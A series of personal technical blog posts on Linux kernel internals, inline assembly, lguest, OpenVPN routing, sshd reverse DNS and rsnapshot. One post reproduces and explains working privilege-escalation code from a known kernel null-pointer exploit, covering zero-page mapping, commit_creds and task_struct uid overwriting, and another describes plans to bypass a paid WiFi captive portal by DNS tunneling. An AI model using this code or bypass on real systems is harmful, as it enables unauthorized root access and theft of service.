Here are some things I learned while reading the Linux kernel source code (some of which took me a couple of hours of googling and searching through documentation, git commit messages, threads on lkml, etc. :P).

1) You cannot write extended toplevel inline assembly; i.e. when you want to use extended inline assembly to pass the values of some C variables or constants, you can only do it inside a function. And as I found out, someone had already filed a bug about it on the GCC bugzilla. So something like this

static const char foo[] = "Hello, world!";
enum { bar = 17 };
asm(".pushsection baz; .long %c0, %c1, %c2; .popsection"
    : : "i" (foo), "i" (sizeof(foo)), "i" (bar));

won’t work.

2) I didn't dig very deep into the inline asm documentation, but I couldn't find what the difference between %c0 and %0 is. It's used in the example code above, and in a kernel macro I saw. I understood that it had something to do with 'constant casting', but I couldn't find the exact difference spelled out anywhere. So I wrote a simple piece of code to clarify it:

int main(void) {
	asm("movl %0, %%eax; movl %c0, %%eax"
		:: "i" (0xff) );
}

and after

gcc -S foo.c

I get:

movl $255, %eax
movl 255, %eax

So %0 is used when we want an integer constant to be used as an immediate operand in instructions like mov, add etc., which means it gets prefixed with $, while %c0 is used when we want the bare number itself, for directives like .long, .size etc., which expect an absolute expression/value as their 'argument'.

3) When using the section attribute on a variable in order to change the section it belongs to, you cannot change the section's type to nobits; it will be progbits. progbits means that the section actually gets space allocated inside the executable (like the text and data sections), in contrast to nobits sections, like bss for example.
i.e. you can't do something like this

static char foo __attribute__((section("bar", nobits)));
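
For instance (a quick made-up test): if you put a variable into a custom section,

static char scratch[4096] __attribute__((section("myscratch")));

then readelf -S on the resulting object file will show myscratch as PROGBITS, and those 4096 (zeroed) bytes will take up real space in the file, unlike a bss-style nobits section.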

4) I also found out about the pushsection and popsection asm directives, which manipulate the ELF section stack and seem to be very useful on certain occasions. pushsection, obviously, pushes the current section onto the section stack and replaces it with the section passed as an argument to the directive, while popsection replaces the current section with the one on top of the section stack.

5) Finally, the 'used' attribute, which tells the compiler that the symbol (a function in our case) is actually used/called/referenced even if the compiler can't 'see' it (otherwise, I think, the compiler optimizations would omit code generation for that function).
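
As a (hypothetical) illustration of both 4) and 5): a static function that is only 'referenced' from inline asm would normally be optimized away, unless we mark it as used:

/* hypothetical example: nothing in the C code calls this function,
 * so without "used" gcc is free not to emit it at all */
static void __attribute__((used)) emit_marker(void)
{
	/* temporarily switch to a custom section, emit a word, switch back */
	asm(".pushsection .my_markers, \"a\"; .long 0x1234; .popsection");
}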

And now a kernel macro which includes all of the above:

/*
 * Reserve space in the brk section.  The name must be unique within
 * the file, and somewhat descriptive.  The size is in bytes.  Must be
 * used at file scope.
 *
 * (This uses a temp function to wrap the asm so we can pass it the
 * size parameter; otherwise we wouldn't be able to.  We can't use a
 * "section" attribute on a normal variable because it always ends up
 * being @progbits, which ends up allocating space in the vmlinux
 * executable.)
 */
#define RESERVE_BRK(name,sz)						\
	static void __section(.discard.text) __used			\
	__brk_reservation_fn_##name##__(void) {				\
		asm volatile (						\
			".pushsection .brk_reservation,\"aw\",@nobits;" \
			".brk." #name ":"				\
			" 1:.skip %c0;"					\
			" .size .brk." #name ", . - 1b;"		\
			" .popsection"					\
			: : "i" (sz));					\
	}
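
The macro is then used at file scope, something like this (a hypothetical reservation; the name and size here are made up):

/* hypothetical usage, at file scope, reserving 64K in the brk area */
RESERVE_BRK(early_scratch, 64 * 1024);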

And a bit more detailed explanation from the git commit

The C definition of RESERVE_BRK() ends up being more complex than
one would expect to work around a cluster of gcc infelicities:

The first attempt was to simply try putting __section(.brk_reservation)
on a variable. This doesn’t work because it ends up making it a
@progbits section, which gets actual space allocated in the vmlinux
executable.

The second attempt was to emit the space into a section using asm,
but gcc doesn’t allow arguments to be passed to file-level asm()
statements, making it hard to pass in the size.

The final attempt is to wrap the asm() in a function to allow
it to have arguments, and put the function itself into the
.discard section, which vmlinux*.lds drops entirely from the
emitted vmlinux.

Another thing to notice is that the wrapper function is put in the .discard.text section, which, according to vmlinux.lds (the linker script used to generate/link the vmlinux executable), will be discarded and thus not included in the executable.
From scripts/module-common.lds:

/*
 * Common module linker script, always used when linking a module.
 * Archs are free to supply their own linker scripts.  ld will
 * combine them automatically.
 */
SECTIONS {
	/DISCARD/ : { *(.discard) }
}

The purpose of the RESERVE_BRK macro, and of the brk-like allocator used for very early memory allocations during the kernel boot process, is an interesting story too (which means another post is coming soon)! ;)

Coolest hack/trick ever!

February 17, 2011

Some time ago, I wrote about lguest, a minimal x86 hypervisor for the Linux kernel, which is mainly used for experimentation and for learning stuff about hypervisors, operating systems, and even computer architecture/ISAs (x86 in particular).

Today I cloned the git repo of the lguest64 port, and I started browsing through the documentation and the code. In the launcher code (the program that initializes/sets up and launches a new guest kernel), I saw the coolest programming hack/trick I've seen in a long time. :P

/*L:170 Prepare to be SHOCKED and AMAZED.  And possibly a trifle nauseated.
 *
 * We know that CONFIG_PAGE_OFFSET sets what virtual address the kernel expects
 * to be.  We don't know what that option was, but we can figure it out
 * approximately by looking at the addresses in the code.  I chose the common
 * case of reading a memory location into the %eax register:
 *
 *  movl <some-address>, %eax
 *
 * This gets encoded as five bytes: "0xA1 <4-byte-address>".  For example,
 * "0xA1 0x18 0x60 0x47 0xC0" reads the address 0xC0476018 into %eax.
 *
 * In this example we can guess that the kernel was compiled with
 * CONFIG_PAGE_OFFSET set to 0xC0000000 (it's always a round number).  If the
 * kernel were larger than 16MB, we might see 0xC1 addresses show up, but our
 * kernel isn't that bloated yet.
 *
 * Unfortunately, x86 has variable-length instructions, so finding this
 * particular instruction properly involves writing a disassembler.  Instead,
 * we rely on statistics.  We look for "0xA1" and tally the different bytes
 * which occur 4 bytes later (the "0xC0" in our example above).  When one of
 * those bytes appears three times, we can be reasonably confident that it
 * forms the start of CONFIG_PAGE_OFFSET.
 *
 * This is amazingly reliable. */
static unsigned long intuit_page_offset(unsigned char *img, unsigned long len)
{
	unsigned int i, possibilities[256] = { 0 };

	for (i = 0; i + 4 < len; i++) {
		/* mov 0xXXXXXXXX,%eax */
		if (img[i] == 0xA1 && ++possibilities[img[i+4]] > 3)
			return (unsigned long)img[i+4] << 24;
	}
	errx(1, "could not determine page offset");
}

It's very well commented, so I don't think there's anything I could explain better.
Very very nice trick!
‘Prepare to be shocked and amazed!’ ;)

Gimme root!

February 17, 2011

I was looking at the Linux kernel null-pointer dereference exploit in /dev/net/tun, aka Cheddar Bay :P, written by Brad Spengler, and I came across some things I hadn't seen before.

In the pa__init function of the exploit, we try to mmap the zero page, and then we set it up accordingly in order to redirect to our “gimme root” code. :P

The piece of code for the mmap looks like this:

	if ((personality(0xffffffff)) != PER_SVR4) {
		mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, 0, 0);
		if (mem != NULL) {
			fprintf(stdout, "UNABLE TO MAP ZERO PAGE!\n");
			return 1;
		}
	} else {
		ret = mprotect(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC);
		if (ret == -1) {
			fprintf(stdout, "UNABLE TO MPROTECT ZERO PAGE!\n");
			return 1;
		}
	}

Thus, I learned that the SVR4 personality (more generally, whenever the MMAP_PAGE_ZERO flag is set in the personality) maps the zero page and fills it with zeros, and that's why we use mprotect for SVR4 instead of mmap, since the zero page is already mapped.
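
Just to see this behaviour in isolation (my own little test, nothing to do with the exploit itself): set the SVR4 personality and then exec something that prints its own mappings; a zero page mapping should show up, subject to vm.mmap_min_addr on newer kernels:

#include <stdio.h>
#include <unistd.h>
#include <sys/personality.h>

int main(void)
{
	/* MMAP_PAGE_ZERO (part of PER_SVR4) is applied at execve time,
	 * so set the personality first and then exec */
	if (personality(PER_SVR4) == -1)
		perror("personality");
	execl("/bin/cat", "cat", "/proc/self/maps", (char *)NULL);
	perror("execl");	/* only reached if execl failed */
	return 1;
}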

The gimme-root code was also fun (spender did his best to mock SELinux :P). However, the code that actually gives us root credentials is only 3 lines:

	if (commit_creds && init_cred) {
		/* hackish usage increment */
		*(volatile int *)(init_cred) += 1;
		commit_creds(init_cred);
		got_root = 1;
	}

where init_cred is the credential struct used by init (aka root :P), and commit_creds points to the kernel symbol/function which is used to manage credentials. spender gets the addresses of those symbols by parsing /proc/kallsyms. However, it seems that the init_cred symbol/struct is not exported, so instead maybe we could craft a new cred struct with uid/gid 0 and then call prepare_creds/commit_creds.

Afaik, this credential 'framework' was introduced with Linux kernel 2.6.30, so spender provides another 'old-school' :P way to get root credentials on older kernels:

/* for RHEL5 2.6.18 with 4K stacks */
static inline unsigned long get_current(void)
{
	unsigned long current;

	asm volatile (
	" movl %%esp, %%eax;"
	" andl %1, %%eax;"
	" movl (%%eax), %0;"
	: "=r" (current)
	: "i" (0xfffff000)
	);
	return current;
}

static void old_style_gimme_root(void)
{
	unsigned int *current;
	unsigned long orig_current;

	current = (unsigned int *)get_current();
	orig_current = (unsigned long)current;

	while (((unsigned long)current < (orig_current + 0x1000)) &&
		(current[0] != our_uid || current[1] != our_uid ||
		 current[2] != our_uid || current[3] != our_uid))
		current++;

	if ((unsigned long)current >= (orig_current + 0x1000))
		return;

	current[0] = current[1] = current[2] = current[3] = 0; // uids
	current[4] = current[5] = current[6] = current[7] = 0; // gids

	got_root = 1;

	return;
}

which finds the current task_struct (through the kernel stack pointer), searches it for our uids/gids, and then sets them to 0 (aka root :P).

The exploit itself is brilliant, and LWN has two very nice articles which explain how the exploit actually works (although spender's own comments are more than enough, touching on Linux kernel security, full disclosure of security bugs, etc.).

So, this one is only for Greeks, or for people from other countries who have travelled with Minoan Lines… :P

If you have ever travelled from Athens to Heraklion (or vice versa :P) on a Minoan Lines ship, maybe you noticed that there's a WiFi hotspot, owned by Forthnet. If you try to use it, you'll be presented with a captive portal.

In order to get access to the Internet, you have to pay some money (extremely overpriced, considering the speed/bandwidth, although… you are on a ship :P).

I suppose Forthnet has many other hotspots, like this one, and I guess the prices are pretty much the same. Unless you are already a Forthnet customer(like I am). Then, you have free access.

But even if you are a Forthnet customer, I think it's fun to find out whether/how you can bypass this captive portal.

A month ago, I was travelling to Crete, so I tried some things, but everything phailed. :P

So, I googled a bit, and I found some interesting things.

Apparently, the best, if not the only, way to bypass the captive portal is DNS Tunneling.

However, the connection was awful, so SSHing to my server, and setting up the “customized” DNS server, was impossible.

So, I did all the preparations (DNS server modifications, etc…) while I was in Crete, and hoped I could test it when I travelled back to Athens.

But the WiFi hotspot (specifically the captive portal 'server', I think) was down when I was travelling back, so I couldn't test the DNS tunneling.

Maybe, next time.

Anyway, if anyone has tried it, let me know.

Although I think the bandwidth/speed will be terrible, considering the DNS tunneling overhead.

Btw, tricks like MAC/IP spoofing, ARP poisoning, hacking a poor unpatched Windoze user (etc etc) and setting up a NAT are out of the question, since I wanted to 'hack' the hotspot/portal, and not the (l)users. :P

Ch(b)eers!

(to the hotspot admins! :P)

I wanted to understand how the code for the early page tables, which the kernel builds just before paging is enabled, works. x86 AT&T assembly isn't very easy to follow, but it's fun though. :P

page_pde_offset = (__PAGE_OFFSET >> 20);

        movl $pa(__brk_base), %edi
        movl $pa(swapper_pg_dir), %edx
        movl $PTE_IDENT_ATTR, %eax
10:
        leal PDE_IDENT_ATTR(%edi),%ecx          /* Create PDE entry */
        movl %ecx,(%edx)                        /* Store identity PDE entry */
        movl %ecx,page_pde_offset(%edx)         /* Store kernel PDE entry */
        addl $4,%edx
        movl $1024, %ecx
11:
        stosl
        addl $0x1000,%eax
        loop 11b
        /*
         * End condition: we must map up to the end + MAPPING_BEYOND_END.
         */
        movl $pa(_end) + MAPPING_BEYOND_END + PTE_IDENT_ATTR, %ebp
        cmpl %ebp,%eax
        jb 10b
        addl $__PAGE_OFFSET, %edi
        movl %edi, pa(_brk_end)
        shrl $12, %eax
        movl %eax, pa(max_pfn_mapped)

Here’s the piece of code.
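
To make sure I got it, here's a rough C rendering of what the loop does (pseudo-C, my own sketch, definitely not kernel code; pa() stands for 'physical address of'):

/* my own pseudo-C sketch of the asm above */
unsigned int *pte = (unsigned int *)pa(__brk_base);      /* %edi: where the page tables grow */
unsigned int *pde = (unsigned int *)pa(swapper_pg_dir);  /* %edx: the page directory */
unsigned int entry = PTE_IDENT_ATTR;                     /* %eax: phys addr 0 + attribute bits */

do {
	/* each PDE covers 4MB: point both the identity slot and the
	 * kernel (PAGE_OFFSET) slot at the page table we're about to fill */
	unsigned int pde_entry = (unsigned int)pte + PDE_IDENT_ATTR;   /* %ecx */

	*pde = pde_entry;                                              /* identity PDE */
	*(unsigned int *)((char *)pde + page_pde_offset) = pde_entry;  /* kernel PDE */
	pde++;

	for (int i = 0; i < 1024; i++) {   /* the stosl loop: fill one page table */
		*pte++ = entry;
		entry += 0x1000;           /* next 4K physical page */
	}
} while (entry < pa(_end) + MAPPING_BEYOND_END + PTE_IDENT_ATTR);

_brk_end = (unsigned long)pte + __PAGE_OFFSET;   /* end of the brk area (virtual) */
max_pfn_mapped = entry >> 12;                    /* number of 4K frames mapped */
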
Have fun! :)

RFC mania

January 22, 2010

I had to do an SNMP-related exercise for the Network Management Lab. We had to write a MIB (Management Information Base) for a firewall, to describe the firewall's filters and rules.
The MIB had to be written in SNMPv2 SMI, so I read some RFCs.
I never liked RFCs, and now I think that they're even more disgusting. :P
Actually, I think that people who are involved with the whole process of the RFCs have serious personal problems(just kidding :P).
And to prove that I have a point, a friend of mine reminded me of an epic RFC.
RFC 1149, or IP over Avian Carriers!!!!
And that’s not the worst part. There’s more!
Some people did an actual implementation of the RFC!
I knew about the RFC but not that there was an “implementation”. :P
About 10 years ago.
Link 1 and Link 2.
The highlight (besides the pigeons, of course) was the source code, and the ping times.

Ok, in fact, I would say that the whole thing was fun and maybe interesting, but the RFCs are still disgusting. :P
Except for RFCs like these :P
:D

OpenVPN/iptables/iproute2

January 19, 2010

Here’s the deal.
We have an OpenVPN server that is part of a network, for instance the network 10.0.0.0/24, with the server's IP being 10.0.0.15.
We connect to the OpenVPN server using UDP and a virtual tap interface, let's say tap0.
After we've connected successfully to the VPN server, we run a DHCP client on the tap0 interface and get an IP inside the 10.0.0.0/24 network, let's say 10.0.0.55.
Along with the IP assignment, a new route will be added to the routing table: a route to the network 10.0.0.0/24, with no gateway (link scope), through the tap0 interface.
However, now we can't contact the OpenVPN server. After the new route is added, all of our packets to the VPN server, including the VPN packets themselves, will be routed through the tap0 interface, and therefore the VPN will stop working.
So, we add to the routing table a route to the VPN server (10.0.0.15), via our local gateway (for instance 192.168.1.1), through our physical network interface (for instance eth0).
Now we can communicate with every other host inside the 10.0.0.0/24 network over an encrypted VPN channel. But all of our connections to the VPN server itself will go over the unencrypted channel (the 192.168.1.1/eth0 route, bypassing the VPN/tap0 interface).
But that’s not what we actually want.
Actually, we want to communicate with the VPN server over the VPN 'tunnel' (and through tap0) for all the connections we make, except for the VPN connection itself.
That’s possible if we use iptables and iproute2.
We'll mark the packets of the VPN connection itself using iptables (i.e. the UDP packets with the VPN server as destination address and, as destination port, the port the server listens on, most likely 1194).
iptables -t mangle -A OUTPUT -p udp -d 10.0.0.15 --dport 1194 -j MARK --set-mark 1
Now, we’ll create a rule with iproute2, which will route the marked packets using a different routing table.
First we create the new table.
echo 200 vpn.out >> /etc/iproute2/rt_tables
We add the rule.
ip rule add fwmark 1 lookup vpn.out
And we add the route for the vpn server to the vpn.out table.
ip route add 10.0.0.15 via 192.168.1.1 dev eth0 table vpn.out
One last thing.
With this configuration, there's a problem with the selection of the source address for the VPN packets sent to the VPN server. Because the marking and the change of route happen later, OpenVPN will see the "10.0.0.0/24, no gateway, dev tap0" route in the main routing table and will select the tap0 IP as the source address, which is obviously wrong, since we want to be routed through the eth0 interface (with IP 192.168.1.2, for instance). This is fixed if we add the "local 192.168.1.2" option to our VPN client configuration file, so that OpenVPN binds to that address and selects it correctly as the source address.
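For reference, a minimal sketch of the relevant client config lines (using the example addresses from above):

# excerpt from a hypothetical OpenVPN client config
remote 10.0.0.15 1194
proto udp
dev tap0
# bind to the eth0 address so it gets selected as the source address
local 192.168.1.2
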
That’s it!
We send only the VPN packets themselves through the 192.168.1.1/eth0 route, and everything else, including all other connections to the VPN server, is sent over the VPN.
This ‘trick’ is very useful when you want to be able to ssh to the VPN server, but you want to prohibit ssh from IPs outside the local network.

~6k lines of C code, and you have an x86 hypervisor in the Linux kernel!

lguest is a very minimal x86 hypervisor for Linux, very easy to set up, and due to its very small code base, it can be fun to hack/tweak.

Besides its small code base, it’s very well documented, thus ‘studying’ the lguest code is probably the best way to start learning a few things about virtualization and hypervisors.

Actually, the Makefile in drivers/lguest/ can be used to 'extract' the comments from the lguest code in a very organized way, which makes it even easier to understand how lguest works (just cd to the directory and type make Beer, or make Puppy if you want some ascii puppies : )

lguest requires some kernel configuration. Besides lguest itself, you must include some virtio modules, particularly virtio_blk, and virtio_net if you need networking inside the guest.
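
Something like this in the kernel .config should do (a sketch from memory; the exact option names may differ between kernel versions):

CONFIG_LGUEST=m
CONFIG_LGUEST_GUEST=y
CONFIG_VIRTIO_BLK=y
CONFIG_VIRTIO_NET=y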

Afterwards, you must compile Documentation/lguest/lguest.c, the launcher which you'll run in userspace every time you want to 'launch' a new guest.

In order to run a new guest, you just run the lguest launcher you just compiled, with some parameters: the amount of memory the guest should have, the kernel image (usually the same image that the host runs) and/or the initrd needed, a rootfs (you can either download a minimal rootfs for testing, or create one using qemu), and the virtual block device (/dev/vda) where the rootfs will be mounted inside the guest.
i.e.
lguest 64m vmlinux --initrd=initrd.img --block=rootfile root=/dev/vda
That’s it! You have a guest running.

Of course lguest lacks features included in other hypervisors/virtualization solutions, but that's the point: a small 'experimental' hypervisor, easy to understand and maybe tweak. ;)

sshd + reverse DNS lookup

October 19, 2009

This post is mainly for ‘self reference’, in case something like this happens again.

According to the sshd man page, by default sshd will perform a reverse DNS lookup on the client's IP, for various reasons.

A reverse DNS lookup is used in order to add the hostname to the utmp file, which keeps track of the logins/logouts on the system. One way to 'switch it off' is by using the -u0 option when starting sshd. The -u option is used to specify the size of the field of the utmp structure that holds the remote host name.

A reverse lookup is also performed when the configuration (or the authentication mechanism used) requires such a lookup. The HostbasedAuthentication auth mechanism, a "from=hostname" option in the authorized_keys file, or an AllowUsers/DenyUsers option in sshd_config that includes hostnames, all require a reverse DNS lookup.

Btw, the UseDNS option in sshd_config, which I think is enabled by default, will not prevent sshd from doing a reverse lookup for the reasons mentioned above. However, if this option is set to 'no', sshd will not try to verify that the resolved hostname maps back to the same IP the client connected from (a check which adds an extra 'layer' of security).
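
To illustrate (made-up examples of mine, not from the man page), these are the kinds of settings that force a reverse lookup no matter what UseDNS says:

# sshd_config: hostname patterns need a reverse lookup to match
AllowUsers admin@*.trusted.example.org

# authorized_keys: the from= option may also need the client's hostname
from="*.trusted.example.org" ssh-rsa AAAA... user@host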

So, the point is that if for some reason the 'primary' nameserver in resolv.conf is not responding, you'll experience a lag when trying to log in over ssh, which can be confusing if you don't know the whole reverse DNS story.

Another thing that I hadn't thought about before learning about sshd's reverse lookups is that a DNS problem can easily 'lock you out' of a computer if you use hostname-based patterns with TCP wrappers (hosts.allow, hosts.deny). And maybe this can explain some "Connection closed by remote host" errors when trying to log in to a remote computer. :P

rsnapshot tips&tricks

July 19, 2009

rsnapshot is a great application for taking backups. It uses rsync and hard links, and makes backup management very easy. It comes with a nice perl script, rsnapreport, which reads the output of the rsync commands invoked by rsnapshot and prints a useful report with the stats of each rsync command.

For detailed info about rsnapshot, you can visit the website of the project.

A typical configuration would set up a cronjob in which the output of the rsnapshot sync command (or rsnapshot daily, if the sync_first option is not enabled) is piped to rsnapreport, and the output of rsnapreport is piped to a CLI SMTP client, to send us a mail with the stats of the sync operation (sendEmail is a very nice SMTP client ;) ).
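
i.e. something along these lines in the crontab (paths, addresses and times are made up):

# hypothetical crontab entries
0 3 * * * /usr/bin/rsnapshot sync 2>&1 | /usr/bin/rsnapreport.pl | sendEmail -f backup@foo -t user@bar -u "rsnapshot report"
30 5 * * * /usr/bin/rsnapshot daily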

However, if you're taking backups of multiple machines, the sync operation can last longer than expected. So, if the data block timeout of our SMTP server isn't large enough, we will never get the email.

This is solved if we use a wrapper script for the rsnapshot sync operation. We use that script in the cronjob, and inside the script we have something like this:

#!/bin/sh
rsnapshot sync > /tmp/rsync_stats 2>&1
cat /tmp/rsync_stats | rsnapreport.pl | sendEmail -f backup@foo -t user@bar -u "rsnapshot report"
rm -f /tmp/rsync_stats

And problem solved! ;)
